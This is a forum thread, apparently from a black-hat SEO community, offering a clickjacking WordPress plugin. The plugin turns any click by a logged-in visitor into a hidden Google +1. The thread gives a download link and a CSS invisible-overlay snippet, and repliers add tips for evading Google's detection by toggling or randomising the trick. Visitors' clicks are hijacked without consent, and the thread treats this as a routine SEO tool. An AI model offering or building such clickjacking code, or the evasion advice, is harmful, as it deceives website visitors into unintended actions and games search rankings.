Auto-Google +1 WP Plugin

ExtremeSEO

BANNED
Joined
Nov 11, 2009
Messages
357
Reaction score
398
The is an automated Google +1 WordPress Plugin. Every time a user comes on your site, is logged into Google, and clicks anywhere on your page - you will automatically receive a +1.

The plugin is simple...just activate and then let it do the rest.

This was a quick script I made in about 15 minutes. If there are any additions or changes, please let me know.

** This is a clickjacking script/plugin. **


Download:
HTML:
http://www.mediafire.com/?n2h9pii94w3bl62

Virustotal:
HTML:
http://www.virustotal.com/file-scan/report.html?id=6f1f9b3b6e34468788bf40c1c0539d05798723b3dfd8ff6eceeb07c155d6f7c2-1313388099
 
Real talk nice share dude, just had a look over the source code, is
Code:
filter= alpha(opacity: 0)
a fallback for older browsers or something, as I believe IE8- don't support the
Code:
opacity:
property?
 
Real talk nice share dude, just had a look over the source code...

Modern browsers user the straight "opacity" while IE uses the "filter" property.

Hense why the code shows:

HTML:
opacity: 0; filter: alpha(opacity = 0);
 
HI, Greate plugin. Thank you. However, I setup it on my site. It converts all of clicks to Google +. That means the visitors can not go anywhere because it adds to Google + when they click. Any solution?
Im interested in Rankbox, do you have any discount for BHW members?
 
When I am trying to install it I am getting an error
Code:
The plugin does not have a valid header.
 
Can google banned my sites due to this plugin??
 
Wow ::::) ! This is a great plugin ! Is it working ? Can google ban our website ?
 
When I am trying to install it I am getting an error
Code:
The plugin does not have a valid header.

You had an installation error. Make sure that you are uploading the "auto-g" folder and not the auto-g_plugin" folder.
 
Thanks for the plugin OP, as far as Google banning for too many google +1 the best suggestion I would have is to monitor the plugin like activate and deactivate during a few hours a day or something at different times on different days so it looks natural.
 
Or just have a random value that doesn't activate the function each 3rd load etc. Not impossible since it's mostly js anyway. :)
 
I installed it. But I couldn't click on any link. nothing happened. Why is that?
 
Back
Top